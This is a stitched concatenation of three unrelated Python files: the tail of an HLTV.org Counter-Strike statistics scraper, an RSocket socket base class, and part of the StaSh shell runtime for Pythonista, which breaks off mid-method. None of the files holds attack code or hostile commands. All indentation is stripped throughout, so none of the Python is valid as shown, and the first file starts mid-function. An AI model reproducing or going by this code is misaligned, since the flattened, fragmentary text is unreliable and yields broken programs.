s2 = f'https://www.hltv.org{tmp2}'
kd = []
kpr = []
hd = []
mp = []
dpr = []
rc = []
names = []
players = []
page = requests.get(s1)
page = BeautifulSoup(page.text, "html.parser")
for i in page.findAll('div', class_='bodyshot-team g-grid')[0].findAll('a'):
players.append(i.get('href'))
for i in players:
names.append(i.split('/')[3])
page = requests.get(f'https://www.hltv.org{i}')
page = BeautifulSoup(page.text, "html.parser")
kd.append(page.findAll('span', class_='statsVal')[0].text)
kpr.append(page.findAll('span', class_='statsVal')[1].text)
hd.append(page.findAll('span', class_='statsVal')[2].text.split('%')[0])
mp.append(page.findAll('span', class_='statsVal')[3].text)
dpr.append(page.findAll('span', class_='statsVal')[4].text)
rc.append(page.findAll('span', class_='statsVal')[5].text.split('%')[0])
players = []
page = requests.get(s2)
page = BeautifulSoup(page.text, "html.parser")
for i in page.findAll('div', class_='bodyshot-team g-grid')[0].findAll('a'):
players.append(i.get('href'))
for i in players:
names.append(i.split('/')[3])
page = requests.get(f'https://www.hltv.org{i}')
page = BeautifulSoup(page.text, "html.parser")
kd.append(page.findAll('span', class_='statsVal')[0].text)
kpr.append(page.findAll('span', class_='statsVal')[1].text)
hd.append(page.findAll('span', class_='statsVal')[2].text.split('%')[0])
mp.append(page.findAll('span', class_='statsVal')[3].text)
dpr.append(page.findAll('span', class_='statsVal')[4].text)
rc.append(page.findAll('span', class_='statsVal')[5].text.split('%')[0])
return kd, kpr, hd, mp, dpr, rc, names
def check_size(arr, i):
if len(arr) != i:
print('ERROR!!!')
exit(-1)
# Optimized
# Get players from match
def get_players_1(url, tick):
players = []
page = requests.get(url)
page = BeautifulSoup(page.text, "html.parser")
page = page.findAll('td', class_='player')
for i in page:
for k in i.findAll('a'):
players.append(k.get('href'))
if tick == 0:
players = players[:5]
elif tick == -1:
players = players[5:15]
else:
players = players[-5:]
# print(players)
names = []
kd = []
kpr = []
hd = []
mp = []
dpr = []
rc = []
for i in players:
names.append(i.split('/')[3])
page = requests.get(f'https://www.hltv.org{i}')
page = BeautifulSoup(page.text, "html.parser")
kd.append(page.findAll('span', class_='statsVal')[0].text)
kpr.append(page.findAll('span', class_='statsVal')[1].text)
hd.append(page.findAll('span', class_='statsVal')[2].text.split('%')[0])
mp.append(page.findAll('span', class_='statsVal')[3].text)
dpr.append(page.findAll('span', class_='statsVal')[4].text)
rc.append(page.findAll('span', class_='statsVal')[5].text.split('%')[0])
new = kd + kpr + hd + mp + dpr + rc
for i in range(len(new)):
new[i] = float(new[i])
if tick == -1:
check_size(new, 60)
else:
check_size(new, 30)
return new
def get_data(url):
# Optimized
def get_date(url):
page = requests.get(url)
return int(int(BeautifulSoup(page.text, "html.parser").findAll('div', class_='date')[0] \
.get('data-unix')) / 1000)
# Optimized
def get_team_name(url):
page = requests.get(url)
page = BeautifulSoup(page.text, "html.parser")
tmp1 = page.findAll('div', class_='teamName')[0].text
tmp2 = page.findAll('div', class_='teamName')[1].text
check_size([tmp1, tmp2], 2)
return [tmp1, tmp2]
# Optimized
def get_g_score(url):
page = requests.get(url)
tmp = BeautifulSoup(page.text, "html.parser")
tmp1 = tmp.findAll('div', class_='team1-gradient')[0] \
.findAll('div')[1].text
tmp2 = tmp.findAll('div', class_='team2-gradient')[0] \
.findAll('div')[1].text
return float(int(tmp1) / (int(tmp1) + int(tmp2)))
# Optimized
def get_history_score(url, current_date):
page = requests.get(url)
page = BeautifulSoup(page.text, "html.parser")
tmp1 = int(page \
.find_all('div', class_='flexbox-column flexbox-center grow right-border')[0] \
.find_all('div', class_='bold')[0] \
.text)
# print(tmp1)
tmp2 = int(page \
.find_all('div', class_='flexbox-column flexbox-center grow left-border')[0] \
.find_all('div', class_='bold')[0] \
.text)
# print(tmp2)
tmp3 = page \
.find_all('tr', attrs=re.compile(".*row nowrap.*"))
counter = 0
score = 0
for i in range(len(tmp3)):
tmp3_date = int(int(tmp3[i].find_all('span')[0].get('data-unix')) / 1000)
if 0 < current_date - tmp3_date < 15552000: # Last 6 months
counter += 1
# print(current_date - tmp3_date)
tmp3_ = tmp3[i].find_all('td', 'result')[0].text
tmp3_ = tmp3_.split()
score += int(tmp3_[0]) - int(tmp3_[2])
# print(tmp3_)
# print(tmp3_date)
if counter != 0:
score = ((score / counter) + 16) / 32
else:
score = 0.5
check_size([tmp1, tmp2, score], 3)
return [tmp1, tmp2, score]
# Optimized
def get_prize_pull(url):
page = requests.get(url)
url1 = BeautifulSoup(page.text, "html.parser") \
.findAll('div', class_='event text-ellipsis')[0] \
.find_all('a')[0] \
.get('href')
page = requests.get(f'https://www.hltv.org{url1}')
txt = BeautifulSoup(page.text, "html.parser") \
.findAll('td', class_='prizepool text-ellipsis')[0].get('title')
try:
txt = txt.split()
txt = txt[0].split('$')[1]
txt = txt.split(',')
res = ''
for i in range(len(txt)):
res += txt[i]
res = int(res)
return res
except:
return 0
# Optimized
def all_stat_team(url, curr_date):
# Optimized
def get_win_streak_and_rate(s):
tmp = s.find_all('div', 'highlighted-stat')
try:
tmp1 = float(tmp[0].find_all('div', 'stat')[0].text)
except:
tmp1 = 0
try:
tmp2 = float(tmp[1].find_all('div', 'stat')[0].text.split('%')[0])
except:
tmp2 = 0
check_size([tmp1, tmp2], 2)
return [tmp1, tmp2]
# Optimized
def get_rank(s):
try:
rank_1 = s[0].findAll('span')[0].text
return int(rank_1.split('#')[1])
except:
return 1000
# Optimized
def get_avarage_age(s):
try:
return float(s[2].findAll('span')[0].text)
except:
return 0
# Optimized
def get_weeks_in_top30_for_core(s):
try:
return float(s[1].findAll('span')[0].text)
except:
return 0
# Optimized
def world_ranking_avarage_age_weeks(s):
tmp = BeautifulSoup(requests.get(s).text, "html.parser")
arr = tmp.findAll('div', class_='profile-team-stat')
tmp = [get_rank(arr), get_weeks_in_top30_for_core(arr),
get_avarage_age(arr), *get_win_streak_and_rate(tmp)]
check_size(tmp, 5)
return tmp
def last_20_matches(s):
team_name = s.split('/')[-1]
print(f'parse {counter_last_matches} last matches for {team_name}')
page = requests.get(s)
page = BeautifulSoup(page.text, "html.parser").find_all('a', 'moreButton')[1].get('href')
page = requests.get(f'https://www.hltv.org{page}')
page = BeautifulSoup(page.text, "html.parser").find_all('div', 'result-con')
# Собрали список последних матчей команды
i = 0
g_i = 0
res = []
score = []
prize = []
players = []
history = []
while g_i < counter_last_matches:
tmp = page[i]
tmp2 = tmp.find_all('a', 'a-reset')[0].get('href')
match_link = f'https://www.hltv.org{tmp2}'
# Проверяем, что матч был раньше
date = get_date(match_link)
if 0 < curr_date - date:
try:
tmp1 = tmp.find_all('td', 'result-score')[0].text.split()
# Счет матча
score_tmp = (int(tmp1[0]) / (int(tmp1[0]) + int(tmp1[2])))
# Приз турнира
prize_tmp = get_prize_pull(f'https://www.hltv.org{tmp2}')
# Save match link
# История встреч
history_tmp = get_history_score(match_link, date)
# Переходим на страницу матча
tmp2 = requests.get(f'https://www.hltv.org{tmp2}')
tmp2 = BeautifulSoup(tmp2.text, "html.parser")
tmp2 = tmp2.find_all('div', re.compile("team.*-gradient"))
# Собираем инфу на команду соперника
# Проверяем, что команда не та же самая
if str(tmp2[0].find_all('a')[0].get('href').split('/')[-1]) != str(team_name):
players_tmp = get_players_1(match_link, 0)
tmp2 = tmp2[0].find_all('a')[0].get('href')
res.append(world_ranking_avarage_age_weeks(f'https://www.hltv.org{tmp2}'))
else:
players_tmp = get_players_1(match_link, 1)
tmp2 = tmp2[1].find_all('a')[0].get('href')
res.append(world_ranking_avarage_age_weeks(f'https://www.hltv.org{tmp2}'))
score.append(score_tmp)
prize.append(prize_tmp)
players.append(players_tmp)
history.append(history_tmp)
# print(f'https://www.hltv.org{tmp2}')
print(f'parse match {g_i}')
g_i += 1
except:
pass
i += 1
return [*res, score, prize, *players, *history]
page = requests.get(url)
page = BeautifulSoup(page.text, "html.parser")
tmp1 = page.findAll('div', class_='team1-gradient')[0].findAll('a')[0].get('href')
tmp2 = page.findAll('div', class_='team2-gradient')[0].findAll('a')[0].get('href')
link1 = f'https://www.hltv.org{tmp1}'
link2 = f'https://www.hltv.org{tmp2}'
arr1 = [*world_ranking_avarage_age_weeks(link1), *world_ranking_avarage_age_weeks(link2)]
arr2 = [*last_20_matches(link1), *last_20_matches(link2)]
arr2_tmp = []
for i in arr2:
for k in i:
arr2_tmp.append(k)
arr2 = arr2_tmp
check_size(arr1, 10)
check_size(arr2, counter_last_matches * 80)
return arr1, arr2
try:
date = get_date(url)
# print(date) # Perfect
# print(*get_team_name(url)) # Perfect
# print(get_g_score(url)) # Perfect
# print(*get_history_score(url, date)) # Perfect
# print(get_prize_pull(url)) # Perfect
tmp = get_players_1(url, -1)
arr1, arr2 = all_stat_team(url, date)
new_list1 = [(url,
*get_team_name(url),
date,
get_g_score(url),
*get_history_score(url, date),
get_prize_pull(url),
*tmp,
*arr1,
*arr2,)
]
with open('data.csv', "a+", newline="") as file:
writer = csv.writer(file)
writer.writerows(new_list1)
# Final size = 79 + 80 * x
except:
pass
parse_links()
first_line = [("URL", "NAME1", "NAME2", 'DATE', 'G_SCORE (A/(A + B))',
'HISTORY_SCORE_A', 'HISTORY_SCORE_B',
'HISTORY_SCORE_MAPS ((SUM(A - B)/N + 16) / 32)' 'PRIZE_POOL',
'KD x 10', 'KPR x 10', 'HEADSHOTS x 10', 'MAPS x 10',
'DPR x 10', 'RC x 10', 'DONT TRY TO UNDERSTAND!!!!'
)]
"""with open('data.csv', "a+", newline="") as file:
writer = csv.writer(file)
writer.writerows(first_line)"""
def main(arr, i):
for k in range(len(arr)):
error = 0
with open('data.csv', "r", newline="") as file:
reader = csv.reader(file)
for row in reader:
if row[0] == f'https://www.hltv.org{arr[k]}':
error = 1
if error == 0:
print(f'Матч - {k}, поток - {i}')
print(f'https://www.hltv.org{arr[k]}')
get_data(f'https://www.hltv.org{arr[k]}')
"""for k in range(len(arr)):
print(f'Матч - {k}, поток - {i}')
print(f'https://www.hltv.org{arr[k]}')
get_data(f'https://www.hltv.org{arr[k]}')"""
for i in range(3):
with open(f'data/matches_links_{i}.json') as file:
a = json.load(file)
main(a, 1)
"""tmp = []
for i in range(0, 20):
with open(f'data/matches_links_{i}.json') as file:
a = json.load(file)
tmp.append(Thread(target=main, args=(a, i)))
for i in tmp:
i.start()
"""
|
socket_abc.py
|
import queue
import typing
from rsockets2.frames import Frame_ABC, KeepAliveFrame
from rsockets2.frames import FrameParser
from abc import ABC, abstractmethod
import threading
import logging
class Socket_ABC(ABC):
def __init__(self, resume_support_enabled=False):
super().__init__()
self.resume_support_enabled = resume_support_enabled
def callback_throw(message: str):
def _inner(*args, **kwargs):
raise Exception(message)
return _inner
self._log = logging.getLogger("rsockets2.socket.socket_abc")
self._receive_handler_bytes = callback_throw(
"Receive Handler Not Set!")
self._socket_closed_handler = callback_throw(
"Socket Closed Handler Not Set!")
self._parser = FrameParser()
self._send_position = 0
self._recv_position = 0
self._foreing_send_position = 0
self._send_queue = queue.PriorityQueue(1000)
self._data_send_store = {}
self.__running = True
self._send_thread = threading.Thread(
name="RSocket-Send-Thread", daemon=True, target=self._send_loop)
self._send_thread.start()
def send_frame(self, frame: Frame_ABC):
if frame.stream_id == 0:
self._send_queue.put((10, frame.to_bytes()))
else:
self._send_queue.put((100, frame.to_bytes()))
@abstractmethod
def _send_frame_internal(self, data: bytes):
raise NotImplementedError()
def _receive_wrapper(self, data: bytes):
self._recv_position += len(data)
frame = self._parser.parseFrame(data)
if isinstance(frame, KeepAliveFrame):
self._foreing_send_position = frame.last_received_position
return frame
def set_receive_handler(self, callback: typing.Callable[[Frame_ABC], None]):
# Wrap the callback into custom handler, so that it receives the frame instead of the bytes
self._receive_handler_bytes = lambda data: callback(
self._receive_wrapper(data))
def set_socket_closed_handler(self, callback):
self._socket_closed_handler = callback
def close(self):
self.__running = False
self._close_internal()
@abstractmethod
def _close_internal(self):
raise NotImplementedError()
def get_recv_position(self) -> int:
return self._recv_position
def _send_loop(self):
try:
while self.__running:
data = self._send_queue.get()[1]
self._send_position += len(data)
if self.resume_support_enabled == True:
self._data_send_store[self._send_position] = data
self._clear_data_send_store()
self._send_frame_internal(data)
except Exception as err:
if self.__running == True:
self._log.debug(
"Error in send_loop: {}".format(err), exc_info=True)
else:
self._log.error(
"Error in send_loop: {}".format(err), exc_info=True)
def _clear_data_send_store(self):
keys_to_remove = []
for key in self._data_send_store.keys():
if key < self._foreing_send_position:
keys_to_remove.append(key)
for key in keys_to_remove:
del self._data_send_store[key]
|
shruntime.py
|
# coding: utf-8
import os
import sys
import platform
import logging
import threading
import functools
from six import StringIO, text_type, binary_type, PY3
try:
file
except NameError:
from io import IOBase as file
import pyparsing as pp
# Detecting environments
try:
import ui
from objc_util import on_main_thread
except ImportError:
from . import dummyui as ui
from .dummyobjc_util import on_main_thread
from .shcommon import ShBadSubstitution, ShInternalError, ShIsDirectory, \
ShFileNotFound, ShEventNotFound, ShNotExecutable
# noinspection PyProtectedMember
from .shcommon import _STASH_ROOT, _STASH_HISTORY_FILE, _SYS_STDOUT, _SYS_STDERR
from .shcommon import is_binary_file, _STASH_EXTENSION_BIN_PATH
from .shparsers import ShPipeSequence
from .shthreads import ShBaseThread, ShTracedThread, ShCtypesThread, ShState, ShWorkerRegistry
# Default .stashrc file
_DEFAULT_RC = r"""BIN_PATH=~/Documents/bin:{bin_ext}:$BIN_PATH
SELFUPDATE_BRANCH=master
PYTHONPATH=$STASH_ROOT/lib:$PYTHONPATH
alias env='printenv'
alias logout='echo "Use the close button in the upper right corner to exit StaSh."'
alias help='man'
alias la='ls -a'
alias ll='ls -la'
alias copy='pbcopy'
alias paste='pbpaste'
alias unmount='umount'
""".format(
bin_ext=_STASH_EXTENSION_BIN_PATH,
)
class ShRuntime(object):
"""
Runtime class responsible for parsing and executing commands.
"""
def __init__(self, stash, parser, expander, no_historyfile=False, debug=False):
self.stash = stash
self.parser = parser
self.expander = expander
self.debug = debug
self.logger = logging.getLogger('StaSh.Runtime')
self.state = ShState(
environ=dict(os.environ,
HOME2=os.path.join(os.environ['HOME'], 'Documents'),
STASH_ROOT=_STASH_ROOT,
STASH_PY_VERSION=platform.python_version(),
BIN_PATH=os.path.join(_STASH_ROOT, 'bin'),
# Must have a placeholder because it is needed before _DEFAULT_RC is loaded
PROMPT='[\W]$ ',
PYTHONISTA_ROOT=os.path.dirname(sys.executable)
),
sys_stdin=self.stash.io,
sys_stdout=self.stash.io,
sys_stderr=self.stash.io,
)
self.child_thread = None
self.worker_registry = ShWorkerRegistry()
config = stash.config
self.rcfile = os.path.join(_STASH_ROOT, config.get('system', 'rcfile'))
self.historyfile = os.path.join(_STASH_ROOT, _STASH_HISTORY_FILE)
self.HISTORY_MAX = config.getint('display', 'HISTORY_MAX')
self.py_traceback = config.getint('system', 'py_traceback')
self.py_pdb = config.getint('system', 'py_pdb')
self.input_encoding_utf8 = config.getint('system', 'input_encoding_utf8')
self.ipython_style_history_search = config.getint(
'system', 'ipython_style_history_search')
self.ShThread = {'traced': ShTracedThread, 'ctypes': ShCtypesThread}.get(
config.get('system', 'thread_type'),
ShCtypesThread
)
# load history from last session
# NOTE the first entry in history is the latest one
if not no_historyfile:
try:
with open(self.historyfile) as ins:
# History from old to new, history at 0 is the oldest
self.history = [line.strip() for line in ins.readlines()]
except IOError:
self.history = []
else:
self.history = []
self.history_alt = []
self.history_listsource = ui.ListDataSource(self.history)
self.history_listsource.action = self.history_popover_tapped
self.idx_to_history = -1
self.history_templine = ''
def load_rcfile(self, no_rcfile=False):
self.stash(_DEFAULT_RC.splitlines(),
persistent_level=1,
add_to_history=False, add_new_inp_line=False)
if not no_rcfile and os.path.exists(self.rcfile) and os.path.isfile(self.rcfile):
try:
with open(self.rcfile) as ins:
self.stash(ins.readlines(),
persistent_level=1,
add_to_history=False, add_new_inp_line=False)
except IOError:
self.stash.write_message('%s: error reading rcfile\n' % self.rcfile)
def find_script_file(self, filename):
_, current_state = self.get_current_worker_and_state()
dir_match_found = False
# direct match of the filename, e.g. full path, relative path etc.
for fname in (filename, filename + '.py', filename + '.sh'):
if os.path.exists(fname):
if os.path.isdir(fname):
dir_match_found = True
else:
return fname
# Match for commands in current dir and BIN_PATH
# Effectively, current dir is always the first in BIN_PATH
for path in ['.'] + current_state.environ_get('BIN_PATH').split(':'):
path = os.path.abspath(os.path.expanduser(path))
if os.path.exists(path):
for f in os.listdir(path):
if f == filename or f == filename + '.py' or f == filename + '.sh':
if os.path.isdir(f):
dir_match_found = True
else:
return os.path.join(path, f)
if dir_match_found:
raise ShIsDirectory('%s: is a directory' % filename)
else:
raise ShFileNotFound('%s: command not found' % filename)
def get_all_script_names(self):
""" This function used for completer, whitespaces in names are escaped"""
_, current_state = self.get_current_worker_and_state()
all_names = []
for path in ['.'] + current_state.environ_get('BIN_PATH').split(':'):
path = os.path.expanduser(path)
if os.path.exists(path):
for f in os.listdir(path):
if not os.path.isdir(f) and (f.endswith('.py') or f.endswith('.sh')):
all_names.append(f.replace(' ', '\\ '))
return all_names
def run(self, input_=None,
final_ins=None, final_outs=None, final_errs=None,
add_to_history=None,
add_new_inp_line=None,
persistent_level=0,
is_background=False,
environ={},
cwd=None):
"""
This is the entry for running shell commands.
:param input_: Default to ShIO
:param final_ins:
:param final_outs:
:param final_errs
:param add_to_history:
:param add_new_inp_line:
:param persistent_level:
The persistent level dictates how variables from child shell
shall be carried over to the parent shell.
Possible values are:
0 - No persistent at all (shell script is by default in this mode)
1 - Full persistent. Parent's variables will be the same as child's
(User command from terminal is in this mode).
2 - Semi persistent. Any more future children will have starting
variables as the current child's ending variables. (__call__
interface is by default in this mode).
:param environ:
:param cwd:
:return:
:rtype: ShBaseThread
"""
# By default read from the terminal
if input_ is None:
input_ = self.stash.io
# noinspection PyDocstring
def fn():
current_worker, _ = self.get_current_worker_and_state()
is_top = current_worker.is_top_level()
try:
if isinstance(input_, ShPipeSequence):
self.run_pipe_sequence(input_,
final_ins=final_ins,
final_outs=final_outs,
final_errs=final_errs,
environ=environ,
cwd=cwd)
else:
if type(input_) is list:
lines = input_
elif input_ == self.stash.io:
lines = self.stash.io.readline_no_block()
else:
lines = input_.splitlines()
for line in lines:
# Ignore empty lines
if line.strip() == '':
continue
# Parse and expand the line (note this function returns a generator object)
expanded = self.expander.expand(line)
# The first member is the history expanded form and number of pipe_sequence
newline, n_pipe_sequences = next(expanded)
# Only add history entry if:
# 1. It is explicitly required
# 2. It is the first layer thread directly spawned by the main thread
# and not explicitly required to not add
if (add_to_history is None and is_top) or add_to_history:
self.add_history(newline)
if is_top:
self.history_swap()
try:
# Subsequent members are actual commands
for _ in range(n_pipe_sequences):
pipe_sequence = next(expanded)
if pipe_sequence.in_background:
# For background command, separate worker is created
self.run(pipe_sequence,
final_ins=final_ins,
final_outs=final_outs,
final_errs=final_errs,
persistent_level=0,
is_background=True,
environ=environ,
cwd=cwd)
else:
self.run_pipe_sequence(pipe_sequence,
final_ins=final_ins,
final_outs=final_outs,
final_errs=final_errs,
environ=environ, cwd=cwd)
finally:
if is_top:
self.history_swap()
except pp.ParseException as e:
if self.debug:
self.logger.debug('ParseException: %s\n' % repr(e))
self.stash.write_message('syntax error: at char %d: %s\n' % (e.loc, e.pstr))
except ShEventNotFound as e:
if self.debug:
self.logger.debug('%s\n' % repr(e))
self.stash.write_message('%s: event not found\n' % e.args[0])
except ShBadSubstitution as e:
if self.debug:
self.logger.debug('%s\n' % repr(e))
self.stash.write_message('%s\n' % e.args[0])
except ShInternalError as e:
if self.debug:
self.logger.debug('%s\n' % repr(e))
self.stash.write_message('%s\n' % e.args[0])
except IOError as e:
if self.debug:
self.logger.debug('IOError: %s\n' % repr(e))
self.stash.write_message('%s: %s\n' % (e.filename, e.strerror))
except KeyboardInterrupt as e:
self.stash.write_message('^C\nKeyboardInterrupt: %s\n' % e.args[0])
# This catch all exception handler is to handle errors outside of
# run_pipe_sequence. The traceback print is mainly for debugging
# the shell itself as opposed to the running script (handled inside
# exec_py_file)
except Exception as e:
etype, evalue, tb = sys.exc_info()
if self.debug:
self.logger.debug('Exception: %s\n' % repr(e))
self.stash.write_message('%s\n' % repr(e))
if self.py_traceback or self.py_pdb:
import traceback
traceback.print_exception(etype, evalue, tb)
finally:
# Housekeeping for the thread, e.g. remove itself from registry
current_worker.cleanup()
# Prompt is now ready for more user input for commands to run,
# if new input line is explicitly specified or when the worker
# thread's parent is the runtime itself and new input line is
# not explicitly suppressed
if add_new_inp_line or (is_top and add_new_inp_line is not False):
self.script_will_end()
# Saves its state to parent or if persistent is required
if not current_worker.is_background:
current_worker.parent.state.persist_child(
current_worker.state, persistent_level=persistent_level)
# Get the parent thread
parent_thread = threading.currentThread()
# UI thread is substituted by runtime
if not isinstance(parent_thread, ShBaseThread):
parent_thread = self
child_thread = self.ShThread(
self.worker_registry, parent_thread, input_, target=fn, is_background=is_background, environ=environ, cwd=cwd)
child_thread.start()
return child_thread
def script_will_end(self):
self.stash.io.write(self.get_prompt(), no_wait=True)
# Config the mini buffer so that user commands can be processed
self.stash.mini_buffer.config_runtime_callback(
functools.partial(self.run, persistent_level=1))
# Reset any possible external tab handler setting
self.stash.external_tab_handler = None
def run_pipe_sequence(self, pipe_sequence,
final_ins=None, final_outs=None, final_errs=None, environ={}, cwd=None):
if self.debug:
self.logger.debug(str(pipe_sequence))
_, current_state = self.get_current_worker_and_state()
n_simple_commands = len(pipe_sequence.lst)
prev_outs = None
for idx, simple_command in enumerate(pipe_sequence.lst):
# The temporary_environ needs to be reset for each simple command
# i.e. A=42 script1 | script2
# The value of A should not be carried to script2
current_state.temporary_environ = {}
for assignment in simple_command.assignments:
current_state.temporary_environ[assignment.identifier] = assignment.value
# Only update the worker's env for pure assignments
if simple_command.cmd_word == '' and idx == 0 and n_simple_commands == 1:
current_state.environ.update(current_state.temporary_environ)
current_state.temporary_environ = {}
if prev_outs:
# If previous output has gone to a file, we use a dummy empty string as ins
ins = StringIO() if type(prev_outs) == file else prev_outs
else:
ins = final_ins or current_state.sys_stdin__
outs = current_state.sys_stdout__
errs = current_state.sys_stderr__
if simple_command.io_redirect:
# Truncate file or append to file
mode = 'w' if simple_command.io_redirect.operator == '>' else 'a'
# For simplicity, stdout redirect works for stderr as well.
# Note this is different from a real shell.
if simple_command.io_redirect.filename == '&3':
outs = _SYS_STDOUT
errs = _SYS_STDERR
else:
errs = outs = open(simple_command.io_redirect.filename, mode)
elif idx < n_simple_commands - 1: # before the last piped command
outs = StringIO()
else:
if final_outs:
outs = final_outs
if final_errs:
errs = final_errs
if self.debug:
self.logger.debug('io %s %s\n' % (ins, outs))
try:
if simple_command.cmd_word != '':
script_file = self.find_script_file(simple_command.cmd_word)
if self.debug:
self.logger.debug('script is %s\n' % script_file)
if self.input_encoding_utf8:
# Python 2 is not fully unicode compatible. Some modules (e.g. runpy)
# insist for ASCII arguments. The encoding here helps eliminates possible
# errors caused by unicode arguments.
simple_command_args = [arg.encode('utf-8') for arg in simple_command.args]
else:
simple_command_args = simple_command.args
if script_file.endswith('.py'):
self.exec_py_file(script_file, simple_command_args, ins, outs, errs)
elif is_binary_file(script_file):
raise ShNotExecutable(script_file)
else:
self.exec_sh_file(script_file, simple_command_args, ins, outs, errs)
else:
current_state.return_value = 0
if current_state.return_value != 0:
break # break out of the pipe_sequence, but NOT pipe_sequence list
if isinstance(outs, StringIO):
outs.seek(0) # rewind for next command in the pipe sequence
prev_outs = outs
# This catch all exception is for when the exception is raised
# outside of the actual command execution, i.e. exec_py_file
# exec_sh_file, e.g. command not found, not executable etc.
except ShFileNotFound as e:
err_msg = '%s\n' % e.args[0]
if self.debug:
self.logger.debug(err_msg)
self.stash.write_message(err_msg)
# set exit code to 127
current_state.return_value = 127
break # break out of the pipe_sequence, but NOT pipe_sequence list
except Exception as e:
err_msg = '%s\n' % e.args[0]
if self.debug:
self.logger.debug(err_msg)
self.stash.write_message(err_msg)
break # break out of the pipe_sequence, but NOT pipe_sequence list
finally:
if isinstance(outs, file) and not isinstance(outs, StringIO):
# StringIO is subclass of IOBase in py3 but not in py2
outs.close()
if isinstance(ins, StringIO): # release the string buffer
ins.close()
def exec_py_file(self, filename,
args=None,
ins=None, outs=None, errs=None):
_, current_state = self.get_current_worker_and_state()
if ins:
current_state.sys_stdin = ins
if outs:
current_state.sys_stdout = outs
if errs:
current_state.sys_stderr = errs
file_path = os.path.relpath(filename)
namespace = dict(locals(), **globals())
namespace['__name__'] = '__main__'
namespace['__file__'] = os.path.abspath(file_path)
namespace['_stash'] = self.stash
saved_sys_argv = sys.argv[:]
# First argument is the script name
argv = [os.path.basename(filename)] + (args or [])
argv = self.encode_argv(argv)
sys.argv = argv
# Set current os environ to the threading environ
saved_os_environ = os.environ
os.environ = dict(current_state.environ)
# Honor any leading vars, e.g. A=42 echo $A
os.environ.update(current_state.temporary_environ)
# This needs to be done after environ due to possible leading PYTHONPATH var
saved_sys_path = sys.path
sys.path = current_state.sys_path[:]
self.handle_PYTHONPATH() # Make sure PYTHONPATH is honored
try:
with open(file_path, "rU") as f:
content = f.read()
code = compile(
content, file_path, "exec", dont_inherit=True
)
exec(code, namespace, namespace)
current_state.return_value = 0
except SystemExit as e:
current_state.return_value = e.code
except Exception as e:
current_state.return_value = 1
etype, evalue, tb = sys.exc_info()
err_msg = '%s: %s\n' % (repr(etype), evalue)
if self.debug:
self.logger.debug(err_msg)
self.stash.write_message(err_msg)
if self.py_traceback or self.py_pdb:
import traceback
traceback.print_exception(etype, evalue, tb)
if self.py_pdb:
import pdb
pdb.post_mortem(tb)
finally:
# Thread specific vars are not modified, e.g. current_state.environ is unchanged.
# This means the vars cannot be changed inside a python script. It can only be
# done through shell command, e.g. NEW_VAR=42
sys.argv = saved_sys_argv
sys.path = saved_sys_path
os.environ = saved_os_environ
def exec_sh_file(self, filename,
args=None,
ins=None, outs=None, errs=None,
add_to_history=None):
_, current_state = self.get_current_worker_and_state()
if args is None:
args = []
args = self.encode_argv(args)
for i, arg in enumerate([filename] + args):
current_state.temporary_environ[str(i)] = arg
current_state.temporary_environ['#'] = len(args)
current_state.temporary_environ['@'] = '\t'.join(args)
# Enclosing variables will be merged to environ when creating new thread
try:
with open(filename, "rU") as fins:
child_worker = self.run(fins.readlines(),
final_ins=ins,
final_outs=outs,
final_errs=errs,
add_to_history=add_to_history,
add_new_inp_line=False,
persistent_level=0)
child_worker.join()
current_state.return_value = child_worker.state.return_value
except IOError as e:
self.stash.write_message('%s: %s\n' % (e.filename, e.strerror))
current_state.return_value = 1
except:
self.stash.write_message('%s: error while executing shell script\n' % filename)
current_state.return_value = 2
def encode_argv(self, argv):
"""
Convert an argv list into the appropiate string type depending
on the currently used python version.
"""
if PY3:
# we need unicode argv
argv = [c if isinstance(c, text_type) else c.decode("utf-8") for c in argv]
else:
# we need bytestring argv
argv = [c if isinstance(c, binary_type) else c.encode("utf-8") for c in argv]
return argv
def get_prompt(self):
"""
Get the prompt string. Fill with current working directory if required
"""
_, current_state = self.get_current_worker_and_state()
prompt = current_state.environ_get('PROMPT')
if prompt.find('\\W') != -1 or prompt.find('\\w') != -1:
curdir = os.getcwd().replace(current_state.environ_get('HOME'), '~')
prompt = prompt.replace('\\w', curdir)
prompt = prompt.replace('\\W',
curdir if os.path.dirname(curdir) == '~'
else os.path.basename(curdir))
return self.stash.text_color(prompt, 'smoke')
def push_to_background(self):
if self.child_thread:
self.stash.write_message('pushing current job to background ...\n')
self.child_thread.set_background()
self.script_will_end()
else:
self.stash.write_message('no running foreground job\n')
self.stash.io.write(self.stash.runtime.get_prompt())
@on_main_thread
def push_to_foreground(self, worker):
worker.set_background(False)
self.stash.mini_buffer.config_runtime_callback(None)
self.stash.write_message(
'job {} is now running in foreground ...'.format(worker.job_id))
# TODO: The history stuff should be handled by a separate class
def add_history(self, s):
if s.strip() != '' and (self.history == [] or s != self.history[0]):
self.history.insert(0, s.strip()) # remove any surrounding whites
if len(self.history) > self.HISTORY_MAX:
self.history = self.history[0:self.HISTORY_MAX]
self.history_listsource.items = self.history
self.reset_idx_to_history()
def save_history(self):
try:
with open(self.historyfile, 'w') as outs:
outs.write('\n'.join(self.history))
except IOError:
pass
def search_history(self, tok):
search_string = tok[1:]
if search_string == '':
return ''
if search_string == '!':
return self.history[0]
try:
idx = int(search_string)
try:
return self.history[::-1][idx]
except IndexError:
raise ShEventNotFound(tok)
except ValueError:
for entry in self.history:
if entry.startswith(search_string):
return entry
raise ShEventNotFound(tok)
def history_up(self):
# Save the unfinished line user is typing before showing entries from history
if self.idx_to_history == -1:
self.history_templine = self.stash.mini_buffer.modifiable_string.rstrip()
self.idx_to_history += 1
if self.idx_to_history >= len(self.history):
self.idx_to_history = len(self.history) - 1
else:
entry = self.history[self.idx_to_history]
# If move up away from an unfinished input line, try search history for
# a line starts with the unfinished line
if self.idx_to_history == 0 and self.ipython_style_history_search:
for idx, hs in enumerate(self.history):
if hs.startswith(self.history_templine):
entry = hs
self.idx_to_history = idx
break
self.stash.mini_buffer.feed(None, entry)
def history_dn(self):
self.idx_to_history -= 1
if self.idx_to_history < -1:
self.idx_to_history = -1
else:
if self.idx_to_history == -1:
entry = self.history_templine
else:
entry = self.history[self.idx_to_history]
self.stash.mini_buffer.feed(None, entry)
def reset_idx_to_history(self):
self.idx_to_history = -1
def history_popover_tapped(self, sender):
if sender.selected_row >= 0:
# Save the unfinished line user is typing before showing entries from history
if self.idx_to_history == -1:
self.history_templine = self.stash.mini_buffer.modifiable_string.rstrip()
self.stash.mini_buffer.feed(None, sender.items[sender.selected_row])
self.idx_to_history = sender.selected_row
def history_swap(self):
self.history, self.history_alt = self.history_alt, self.history
def get_current_worker_and_state(self):
"""
Get the current thread and its associated state.
:return:
:rtype: (ShBaseThread, ShState)
"""
